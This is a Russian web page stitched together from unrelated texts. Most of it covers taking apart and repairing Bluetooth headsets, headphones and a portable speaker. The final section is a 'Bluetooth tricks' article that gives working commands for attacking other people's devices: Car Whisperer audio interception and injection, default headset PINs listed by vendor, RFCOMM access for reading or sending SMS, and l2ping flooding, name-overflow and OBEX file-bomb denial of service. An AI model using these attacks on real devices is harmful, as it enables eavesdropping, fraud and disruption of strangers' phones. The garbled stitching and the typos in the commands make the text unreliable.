Разбираем bluetooth гарнитуру. Как разобрать наушники: инструкция с пошаговым фото ремонта всех элементов гарнитуры. Сломался регулятор громкости

  • 04.11.2019

Гарнитуры используются для передачи данных с телефона в наушники, тем самым освобождая человека от необходимости постоянно держать телефон в руках при разговоре. Как и любое другое устройство, гарнитуры разбираются.

Вам понадобится

  • - маленькая крестовая отвертка;
  • - неострый нож.

Инструкция

  • Если вы хотите разобрать беспроводную Bluetooth-гарнитуру, предварительно скачайте схему именно вашей модели устройства. Это необходимо в том случае, если ранее вы не имели дела с разборкой подобных устройств, наушников и микрофонов, а также позволит вам заранее предусмотреть аспекты касательно отличий вашей модели от других.
  • Внимательно изучите корпус вашей беспроводной гарнитуры на наличие заглушек, скрывающих соединительные элементы. Часто производители вместо них используют специальный клей, в данном случае разборка будет невозможна. Открутите все видимые крепежные элементы и отсоедините от платы все внутренние элементы. Будьте предельно осторожны, поскольку в некоторых случаях они бывают припаяны.
  • Если все же вы решили разобрать модель, корпус которой склеен, подденьте стык частей корпуса неострым ножом и слегка ударьте по нему. Не стоит прилагать особых усилий в том случае, если гарнитура понадобится вам в дальнейшем.
  • Для того чтобы разобрать проводную гарнитуру, снимите корпус микрофона,поддев его пластиковой картой, неострым ножом или плоской отверткой, затем снимите наушники, точно также сняв их корпусы. При разборке проводной гарнитуры будьте особенно внимательны с мелкими деталями наушников, поскольку провода припаяны к динамикам, постарайтесь не повредить их соединение.
  • Если вы хотите разобрать гарнитуру с большими наушниками, снимите с их корпуса все видимые заглушки, после чего открутите все болты и разберите устройство. Также будьте предельно аккуратны с соединением динамиков с проводами. Выполняйте разборку на застеленной поверхности, чтобы не потерять мелких составных деталей, также складывайте отдельно все крепежные болты, поскольку если вы их потеряете, новые найти будет достаточно проблематично.
  • Совет добавлен 2 ноября 2011 Совет 2: Как разобрать гарнитуру Nokia Разобрать гарнитуру Nokia можно лишь зная как правильно это делать, в противном случае, можно нанести вред своему мобильному телефону. Конечно, иногда требуется разобрать не всю гарнитуру, а только какую-то ее часть, что тоже требует определенных навыков.

    Вам понадобится

    • - гарнитура Nokia;
    • - заточенная пластиковая карта;
    • - тонкая крестовая отвертка;
    • - пинцет.

    Инструкция

  • Перепаяйте наушники с другой гарнитуры, а можете проделать это же и с разъемом на проводе. Этот вариант подходит в том случае, когда звук в наушниках пропадает или не слышен совсем. Скорее всего, при такой проблеме имеет место скрытый разрыв провода.
  • Чтобы сделать разъем, необходимо разобрать гарнитуру. Для начала приготовьте все инструменты, которые потребуются вам для разборки. Затем возьмите пластиковую карту с очень тонкой заточкой и аккуратно отщелкните панель под кнопкой. Следом за ней отщелкните кнопку. Сделать это труда не составит, так как приклеены эти детали на двусторонний скотч.
  • Далее крестовой отверткой открутите два винтика и разберите корпус гарнитуры. Так как винтики очень маленькие, сразу же положите их в надежное место, чтобы не потерять. Затем вытащите аккуратно внутреннюю плату, чтобы не повредить никаких соединений. После извлечения платы разогрейте паяльник и отпаяйте неработоспособные наушники, которые вы хотите заменить новыми. Проводки старых наушников вытащите с помощью пинцета и удалите их.
  • Произведя замену наушников, соберите корпус гарнитуры. Сначала осторожно вставьте в корпус извлеченную внутреннюю плату, затем закрутите обратно все винтики и поставьте на место кнопку, защелкнув панельку на положенном для нее месте.
  • Обратите внимание Так как корпус гарнитуры обычно выполнен из тонкого пластика, будьте осторожны, разбирая его, чтобы нечаянно не повредить детали. Иногда в том, что наушники не передают звук, виновата завоздушенность между динамиком и декоративной сеточкой, прикрывающей динамик от повреждений и грязи. В этом случае снимите ее и почистите поверхность жесткой маленькой щеточкой так, чтобы щетинки проходили сквозь ячейки сеточки. Удалив таким образом мельчайшие частички пыли и грязи, вы обеспечите беспрепятственное поступление воздуха между динамиками и их защитой. Как разобрать гарнитуру Nokia - версия для печати

    Этак колонка известна уже всем интересующимся темой портативной акустики, неоднократно похвалена, продаётся решительно везде и продолжает радовать почтенную публику прекрасным, на мой взгляд, соотношением цена/качество/функционал. Однако многие вещи, имеющие начало, имеют и безвременный конец - и иногда возникает необходимость разобрать сабж для ремонта . Кому интересно - пожалуйте к прочтению.

    Не буду расписывать тонкости заказа сабжа на Алиэкспрессе - в заголовке указан самый дешёвый продавец на момент написания обзора. К тому же такую колонку за те же 2 т.р. легко купить с рук в состоянии новой, по крайней мере в Москве. В оффлайновых магазинах за эти деньги попадается «международная», или «индийская» версия - без слота microSD - будьте внимательны.

    Итак, у меня и ближайших друзей таких колонок уже четыре. В полном соответствии с теорией вероятности, отягощённой присутствием достойных продолжателей рода в возрасте до 3-х лет, одна из этих колонок рухнула-таки со стола на кафельный пол, и в ней что-то закувыркалось. Консилиум потрошителей постановил: вскрытие!

    Однако девайс сбит плотно и выглядит неприступно. В интернете есть фото потрохов из (файл Internal Photos), но про собственно разборку нигде нет ни слова. Что же, консилиуму потрошителей не привыкать к бесчеловечным экспериментам. Начнём.

    Для начала отклеиваем резиновую ножку со стороны слота microSD. Под ней - единственный винтик. Выкручиваем. Ничего не происходит. :)

    Теперь вооружаемся тонким ножом (брелок Victorinox подойдёт:)) и пытаемся отжать защёлки всё на той же крышке с SD-слотом, по узким её сторонам. На картинках ниже видно, как они расположены. При известной аккуратности крышка вынимается легко, она не приклеена. Зато в неё вклеен микрофон, и к нему идёт провод - но он достаточно прочный и ничему не помешает.


    Теперь тем же ножом проходимся в зазоре противоположной крышки, чтобы отклеить от лицевой стороны металлического корпуса скотч, удерживающий внутренности. Также подрежем и зазор со стороны уже снятой крышки. Будьте осторожны, не вставляйте нож слишком глубоко, чтобы не повредить резиновую прокладку между потрохами и корпусом.На фото извлечённых потрохов будет виден и скотч, и прокладка.

    Отклеив скотч, аккуратно и довольно сильно нажимаем на потроха со стороны снятой крышки. Не давите на плату - лучше упереться каким-нибудь инструментом в пластиковое основание внутреннего блока или воспользоваться кончиком ножа как рычагом. Усилие нужно достаточно большое и в течение некоторого времени, но, если Вы предварительно вывернули винт под ножкой, то потроха держатся только на скотче и в конце концов должны выйти. У края видны две изорванных полоски скотча миллиметров по 7.

    Извлекаем потроха, проталкивая за ними и левую крышку на проводе в корпус. На аккумуляторе видны две полосы пенного скотча - он односторонний, за корпус не держит, на извлечение не влияет. По периметру тыльной стороны идёт та самая резиновая прокладка, обеспечивающая герметичность объёма колонки с тыльной стороны динамиков и правильную раскачку пассивного излучателя, от которой целиком зависит качественное воспроизведение басов в таких системах. В районе разъёма на фото прокладка помята - издержки китайской сборки. If any - выправляем и присаживаем на суперклей. Старайтесь при вскрытии не погнуть корпус и не повредить прокладку - иначе убьётся бас.

    А вот и он - больной зуб виновник разборки. От удара у динамика откололся магнит. Причём не по клеевому шву (типа поксипола), а по материалу (пластик с большим количеством наполнителя, потому хрупкий).

    Магнит неодимовый, достаточно мощный:)

    Катушка динамика достаточно большого диаметра, намотана на алюминиевом каркасе (прочность и хороший теплоотвод) с зазором для исключения короткозамкнутого витка (видно на фото). Если у Вас тоже отлетел магнит - проверьте, не загнулись ли края каркаса и не замкнулся ли зазор. Если что - аккуратно поправьте, не поцарапав провод.

    Кстати, коллеги, если кто знает, где купить такие или проверенно сопоставимые по качеству динамики отдельно - поделитесь, плз.

    Аккумулятор мешает поставить магнит на место, а отклеить его очень проблематично. Поэтому тщательно осматириваем излом, примеряем магнит, чтобы вставал на старое место без зазора, и только потом клеим. Я закапал под спозиционированный магнит немного (!!!) суперклея с помощью зубочистки и сильно прижал на десять секунд. Для надёжности выступивший клей засыпал содой - эта смесь мгновенно твердеет, образуя достаточно плотный объёмный шов. Остатки соды тщательно выдуваем из динамика. В идеале склеенный девайс лучше оставить в покое на недельку, чтобы «секундный» клей полимеризовался в глубине шва. Естественно, вместо суперклея можно использовать быструю эпоксидку или даже «Момент» - в небольших количествах, чтобы капли клея не попали в магнитный зазор и на катушку.

    Проверьте, не шуршит ли восстановленный динамик катушкой об магнит. Если шуршит - можно склеенное разобрать феном, но осторожно - суперклей размягчается при 70°C, а неодимовый магнит может размагнититься уже при 90! ТАк что лучше будьте аккуратны с самого начала.

    Собираем всё как было:

    Собранная колонка зазвучала сразу, прежний звук полностью восстановился, на полной громкости динамик не развалился:)

    Надеюсь, что данный отчёт помог кому-то в нелёгком деле обуздания электронного дракона.
    Всем удачи!

    Планирую купить +4 Добавить в избранное Обзор понравился +14 +39

    Беспроводная гарнитура, посредством которой звук с телефона передается непосредственно в ушную раковину человека, без сомнения очень удобное и практичное устройство.

    С ее помощью руки остаются свободными и позволяют безопасно управлять автомобилем или просто делать повседневные дела, общаясь при этом по мобильной связи.

    По мимо удобства, считается, что излучения от «голубого луча» намного безопасней мощного излучения, исходящего непосредственно от мобильного телефона. Для многих это очень весомый аргумент в пользу блютуз гарнитуры.

    Например, его можно с успехом ремонтировать или модернизировать. Ниже в этой статье будет описан вариант ремонта блютус гарнитуры, а именно замена слухового динамика.

    В каких случаях это может понадобиться?

    1. Когда при покупке гарнитуры, на максимальной громкости в шумном месте, ничего не можно разобрать из разговора, а вернуть обратно в магазин нет возможности.
    2. Когда со временем слуховой динамик частично или полностью выходит из строя.

    Речь пойдет о замене слухового динамика.

    Вот, на фото обычная гарнитура с проблемой громкости динамика.

    Заменить этот динамик, даже на такой же оригинальный, может ничего не дать, поэтому замена будет происходить на слуховой элемент с дешевых, возможно с полурабочих наушников.

    Главное подобрать элемент с самой высокой громкостью на выходе.

    Для этого - если есть несколько наушников,- необходимо подключить каждые по очереди и оценить громкость звука при одинаковом уровне, выставленном на телефоне.

    Но сначала нужно снять старый динамик. Делать это необходимо при выключенном приборе.

    Когда динамик отклеен, аккуратно отпаиваем от него провода.

    Длины оставшихся проводов будет вполне достаточно для комфортной пайки другого элемента. Можно еще немного, пинцетом подтянуть их, что даст дополнительную длину.

    Разбираем наушник и отклеиваем его динамик.

    Прикладываем припаянный динамик к корпусу, и по кругу, с натяжкой обматываем его черной ПВХ лентой.

    Включаем устройство и проверяем его работу.

    После такого ремонта, гарнитурой можно прекрасно пользоваться и звук будет намного лучше оригинального.

    Беспроводные наушники (гарнитура или головные телефоны) относятся к аксессуарам в категории бытовой техники, за ремонт которой неохотно берутся сервисные центры, несмотря на то, что цена на некоторые модели весьма немаленькая. Вернуть к жизни неисправные наушники могут их владельцы. Для этого потребуется немного терпение, умение держать отвертку и паяльник в руках, а наличие в хозяйстве самого простого тестера только приветствуется.

    В статье - , мы разобрали мини акустическую систему, рассмотрели ее конструкцию и устранили неисправность. Здесь и сейчас мы с Вами выполним ремонт беспроводных Bluetooth наушников Nokia BH-905.

    В качестве примера рассмотрим самые распространенные неисправности для устранения, которых не потребуется глубоких теоритических знаний в области радиоэлектроники:

    • не заряжается аккумулятор в наушниках
    • аккумулятор заряжается, но время автономной работы явно меньше заявленного в инструкции
    • не работает правый или левый наушник.

    Большинство моделей наушников снаружи корпуса не имеют никаких видимых шурупов и винтов, и у многих владельцев решивших отремонтировать аксессуары самостоятельно возникает вопрос - как разбираются наушники .

    Для того чтобы найти спрятанные винты в наушниках Nokia BH-905 нам необходимо отклеить кожаный амбушюр. Здесь следует отметить, что именно в этом месте прячут винты большинство производителей наушников.

    Вывернув винты, убеждаемся в том, что такой разборки явно недостаточно для доступа к «внутренностям», но для замены динамика шаг необходимый. Для доступа к аккумулятору и плате беспроводных наушников необходимо зайти с другой стороны...

    Снимаем для начала приклеенную декоративную накладку с надписью Nokia, аккуратно поддеваем и снимаем декоративный ободок.

    Здесь прячутся еще четыре шурупа которые необходимо открутить.

    Нашему взору открывается плата, аккумулятор и в глаза сразу же бросается неисправность - оторванный или плохо припаянный провод от аккумулятора. В наушниках применяется без корпусной аккумулятор - элемент батареи находится в пакете типа полиэтилена. Пакет герметично запаян. Если внешний вид аккумулятора напоминает надутый шарик, то это говорит о том, что внутри батареи идет химическая реакция с выделением газов. Вздутость это первый признак деградации аккумулятора.

    Емкость таких аккумуляторов меньше исправных, соответственно, заряжаются и разряжаются неисправные аккумуляторы значительно быстрее исправных. Для замены неисправной батареи необходимо подобрать подходящий по размерам и характеристикам аккумулятор. В беспроводных наушниках используется аккумуляторная батарея 3,7 Вольт, 280mAh.

    Время автономной работы Bluetooth наушников Nokia BH-905 с исправным аккумулятором достаточно продолжительное: 24 часа в режиме разговора через Bluetooth, примерно 25 часов в качестве Bluetooth-наушников. Включение шумоподавителя уменьшает время работы примерно на треть – 15 и 16 часов соответственно. При проводном подключении и включенном шумоподавителе можно слушать музыку почти 40 часов без перерыва.

    Все отлично знают, что с помощью Bluetooth можно передать файл с девайса на девайс или подключить беспроводную гарнитуру. Но этим его возможности не ограничиваются. Имея при себе нужный инструмент, можно творить настоящие чудеса. Так почему бы не попробовать себя в роли фокусника?

    Встроенный модуль технологии Bluetooth (или, если более официально, IEEE 802.15.3 ) давно перестал быть диковинкой. Стоимость модуля настолько мизерна, что не встраивает его в мобильный, ноутбук или КПК только ленивый производитель. Да и то – по соображениям маркетинга. Словом, Bluetooth используют практически все. Но лишь единицы знают, что, используя технологию, рискуют выдать свои конфиденциальные данные. Но начнем все-таки с хорошего!

    Трюк 1: Используем BT для удаленного доступа к компьютеру

    Как-то для проведения презентации я пригласил одну длинноногую подругу – нажимать кнопку «пробел», чтобы перелистывать слайды в Power Point. Это удовольствие стоило мне недешевого обеда и двух часов пустых разговоров с Barbie girl. После этого я твердо решил: в следующий раз проблему отсутствия пульта ДУ я обойду по-другому. И обошел, воспользовавшись мобильником! Да-да, прямо с телефона можно перелистывать слайды, управлять музыкой – и делать еще бог знает что. Главное, чтобы на мобильнике и компьютере были установлены BT-модули. Мало того, что сэкономишь деньги и силы, так еще и выглядеть будешь непростительно модно. Показать такой фокус способен каждый, кто заюзает утилиту
    Bluetooth Remote Control
    , не столь давно обновившуюся до версии 3.0. Она позволяет управлять компьютером с экрана любого мобильного телефона. Все очень просто. На компьютер ставится специальная серверная часть, а на телефон – программа-клиент, написанная на Java (требуется MIDP 2.0). После настройки нехитрой схемы ты сможешь дистанционно управлять мышкой и клавиатурой компа. И самое главное – получишь доступ к удаленному рабочему столу. Настоящий Remote Desktop прямо с экрана мобильного телефона! Ну, а с длинноногой подругой время можно провести куда более удачно. Bluetooth Remote Control пригодится и здесь: чтобы поставить
    романтическую музыку:).

    Трюк 2: Контроль доступа с помощью BT

    Если ты работаешь в комнате, где вместе с тобой сидит с десяток коллег, тебе наверняка приходилось блокировать компьютер, когда уходишь в другое помещение. А что? Не успеешь отойти, как кто-нибудь уже покопается на твоем харде. Расклад не самый приятный. В общем, лочить компьютер нужно обязательно, вопрос в том – как? Можно использовать стандартные возможности винды и по десять раз на дню вводить длиннющий пароль. Или же делать это красиво с помощью технологии Bluetooth . Все просто, как дважды два. Отходишь от компьютера – и он тут же блокируется. Возвращаешься обратно – и лока как не бывало! Единственное условие: как в компьютере, так и в мобильном телефоне должен быть установлен модуль
    Bluetooth , а в системе заинсталена программа LockItNow (ты легко можешь ) . Впрочем, приятелям и коллегам можно рассказывать о телепатических возможностях, а потом продавать секрет за деньги:). Кстати говоря, если под рукой BT-модуля нет, то его можно заменить телефоном, который поддерживает «синий зуб» (подключи по COM-порту).

    Трюк 3: Снифаем BT-трафик из эфира

    Мастерство начинается с понимания. Не возникало ли у тебя когда-нибудь желания посмотреть внутрь протокола и узнать, как происходит обмен данными через «синий зуб»? Прослушивание трафика Bluetooth может выполняться только «в себя», то есть выполняется перехват исходящего и входящего трафика узла, на котором ты отдал команды. В этом деле немаловажное значение имеет так называемый Host Controller Interface (HCI), который позволяет обращаться к передатчику. HCI-узел обычно подключается к узлу драйвера устройства Bluetooth (входящий поток) и к узлу L2CAP (исходящий поток). Windows платформа по умолчанию такой возможности не предоставляет. Однако сторонними разработчиками были выпущены
    специальные драйвера, которые позволяют переводить стандартный донгл в сниффер . Традиционно показательной в этом плане является работа FTS4BT Wireless Bluetooth Protocol Analyzer , стоящего бешеные деньги. Продукт цепляет тем, что поддерживает новый Bluetooth v2.0 + EDR , на базе которого работают современные устройства и, более того, способен на лету декодировать весь трафик из эфира, аккуратно отсортировывая аудио, данные протоколов приложений и многое другое. Понятно, что для снифинга (да и вообще) наиболее актуальны USB-донглы класса 1, радиус действия которых достигает ста метров.

    Трюк 4: Работаем с BT-адаптером напрямую

    Долгое время Bluetooth стеки для Windows предоставляли настолько скудные возможности , что программисты просто обходили эту платформу стороной. Этим объясняется, что большинство программ для серьезных забав c «синим зубом» разрабатываются под никсовую платформу. Некоторые из хитрых приемов мы разберем именно на это платформе, а именно FreeBSD (напомню, что на диске прошлого номера мы выкладывали свежий 7.0 релиз этой ОС). Сама технология Bluetooth официально стала поддерживаться на ней только с 5-ой ветки на базе подсистемы Netgraph. Радует, что большинство USB-адаптеров совместимы с драйвером ng_ubt (его необходимо завести перед подключением устройства). Попробуем?

    1. Подключаем устройство: kldload ng_ubt
    2. Копируем сценарий подгрузки стека в удобное место: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
    3. Копируем сценарий подгрузки стека в удобное место и запускаем: sh /usr/local/etc/rc.bluetoots start ubt0

    Теперь хочу познакомить тебя с утилитой hccontrol. Это одна из основных программ для работы с BT-модулем. Именно она выполняет все операции, связанные с интерфейсом HCI, и имеет следующий синтаксис: hccontrol –n <имя_hci_узла> <команда>. Проверим функциональность нашего устройства, просканиров эфир на наличие устройств:

    hccontrol –n ubt0hci Inquiry

    Как результат, утилита выведет информацию о найденных устройствах, в том числе их MAC-адреса. Надо заметить, что каждое из устройств Bluetooth, будь то хедсет или обыкновенный телефон, представляет некоторый набор сервисов . Базовый перечень включает в себя: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point). Чтобы выяснить, какие сервисы предоставляет то или иное устройство, используется запрос на специальном протоколе SPD (Service Descovery Protocol). Сервер SPD работает непосредственно на машине-хосте и является исключительно информационной составляющей (повлиять на него
    невозможно). Определить, какие сервисы предоставляют найденные устройства, можно с помощью соответствующей утилиты:

    # spdcontrol -a browse

    Трюк 5: Находим скрытые устройства

    Итак, эфир мы просканировали и даже выяснили, какие сервисы доступны на активных устройствах. Но вот загвоздка! Некоторые девайсы никак не выдают своего присутствия, поскольку находятся в режиме «Undiscoverable mode» и не отвечают на широковещательные запросы. По настройкам своего телефона ты наверняка знаешь о подобной опции безопасности. Однако обнаружить такие устройства все-таки можно !

    Самый известный прием их обнаружения – тупой перебор MAC-адресов, то есть последовательная посылка запросов на разные адреса из определенного диапазона. Для этого нужно использовать очень простую утилиту Redfang , которая перебирает последние шесть байт адреса устройства и таким образом обнаруживает спрятавшиеся устройства.

    Другой вариант – это использовать пассивные методики : перевести свое устройство в режим ожидания, при этом назначить сети какое-нибудь привлекательное имя:

    hciconfig hci0 name BT_YANDEX
    hciconfig hci0 down
    hciconfig hci0 up
    hcidump -V | grep bdaddr

    В результате отобразятся все входящие соединения, среди которых могут запросто оказаться товарищи со скрытыми идентификаторами.

    Трюк 6: Перехватываем из эфира разговоры по гарнитуре

    Одна из основных угроз радиотехнологий состоит в том, что данные можно перехватить. Первое, что приходит в голову, касаемо Bluetooth – прослушать разговоры людей, использующих гарнитуру . И зачастую это реально! На хакерском фестивале What the Hack в Нидерландах специалисты из группы Trifinite продемонстрировали, как при помощи ноутбука с Linux, специальной программы и направленной антенны можно подслушать, о чем говорит через Bluetooth-гарнитуру водитель проезжающего автомобиля. Группа разработала программу Car Whisperer («Автомобильный шептун»). Возможности программы относительно невелики: прослушать можно только тех, кто забыл сменить заводские пароли доступа к Bluetooth наподобие
    «0000» или «1234». Но таких бедолаг, поверь, очень и очень много! «Шептун» способен вклиниться и успешно пройти «pairing» устройств, получив информацию, передаваемую с каркита или хедсета на мобилку. Хочу обратить внимание: утилита позволяет не только получить информацию, передающуюся между хедсетом и мобилой, но и инжектить туда свою. Мы решили проверить возможности этой программы, скачав Car Whisperer с сайта разработчиков.

    hciconfig адаптер class 0x500204
    # 0x500204 - это класс «phone»

    В противном случае некоторые «умные» девайсы могут заподозрить неладное. Смотрим синтаксис утилиты, который выглядит следующим образом:

    ./carwhisperer «что внедряем в линию» «что захватываем из линии» «адрес устройства» [канал]

    Мы взяли внедряемый файл прямо из папки утилиты, а в качестве выходного указали out.raw:

    ./carwhisperer 0 message.raw /tmp/out.raw
    00:15:0E:91:19:73

    На выходе получаем файл out.raw. Прослушать его в чистом виде нельзя: необходимо преобразовать в аудио формат, для чего потребуется дополнительная утилита. Подойдут довольно многие аудио конвертеры, например :

    raw –r 8000 –c 1 –s –w out.raw –t wav –r
    44100 –c 2 out.wav

    Кроме прослушивания, можно войти в систему, просмотреть телефонную книгу и воспользоваться другими возможностями «свободных рук» с Bluetooth. Принцип такой: сначала осуществляется поиск активных устройств и проверка на предмет сервиса HS (Head Set). Далее исследуется MAC-адрес устройства и производится попытка подключения с использованием стандартного ключа. Если коннект установлен, то с устройством можно делать все, что угодно (в пределах доступного набора AT-команд).

    На практике это выглядит следующим образом. Сначала осуществляется поиск всех активных гарнитур с помощью команды «sdptool search HS», которая выдает примерно такой ответ:

    Inquiring ...
    Searching for HS on 00:0A:3A:54:71:95 ...
    Service Name: Headset
    Service RecHandle: 0x10009
    Service Class ID List:
    "Headset" (0x1108)
    "Generic Audio" (0x1203)
    Protocol Descriptor List:
    "L2CAP" (0x0100)
    "RFCOMM" (0x0003)
    Channel: 7
    Language Base Attr List:
    code_ISO639: 0x656e
    encoding: 0x6a
    base_offset: 0x100
    Profile Descriptor List:
    "Headset" (0x1108)
    Version: 0x0100

    Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

    Nokia (00:02:EE...) - pin="5475"
    Audi UHV (00:0E:9F...) - pin="1234"
    O"Neill (00:80:37...) - pin="8761"
    Cellink (00:0A:94...) - pin="1234"
    Eazix (00:0C:84...) - pin="1234"

    Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам . При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

    Трюк 7: DDoS BT-устройств

    Подход традиционен. DDoS реально провести, когда хостовый девайс («master») выполняет работу, во много раз превосходящую клиентскую. Такую ситуацию называют атакой на отказ в обслуживании (Denial Of Service). Она может подвесить телефон или привести к быстрой разрядке батарейки. Провести атаку можно несколькими способами. Начнем со стандартных средств. Самое очевидное – пинговать девайс пакетами большого размера. Сделать это можно, указав утилите l2ping в качестве параметра «-s» флаг:

    # l2ping -s 10000 -b "МАС адрес"

    Сама программа, как ты уже понял, является родственником ping в bluetooth среде и служит для проверки связи и наличия соединения. Другой способ, принципиально отличающийся от первого, состоит в использовании приема «fuzzing» – своеобразной техники-лотереи, потому как заранее неизвестно, что произойдет. Это новое веяние в выявлении уязвимостей в продуктах без анализа исходных кодов. Полагается техника только на интерактивное общение с объектом на понятном для него языке, но с абсолютно хаотичными аргументами и значениями-переменными. Хакерской задачей будет сделать так, чтобы видимое название телефона состояло из достаточно большого числа элементов. При обнаружении его «master"ом» в 70%
    случаев происходит переполнение или отказ в обслуживании:

    hciconfig hci0 name `perl -e "print "ash" x 3137"`
    # Команда для линукса
    hccontrol –n адаптер change_local_name “новое имя”)
    # пример для FreeBSD

    Многие телефоны по-прежнему не могут переварить файлы-бомбы. Вот простая реализация подобного приема.

    1. Сначала готовят «бомбу». Известный пример:
      echo `perl -e "print "skvz" x 3137"` > file
    2. После чего используют модифицированную утилиту для взаимодействия с OBEX – USSP PUSH (xmailserver.org/ussp-push.html)
      ./obextool push file 00:0A:3A:54:71:95 `perl -e "print "skvz" x 3137"` 3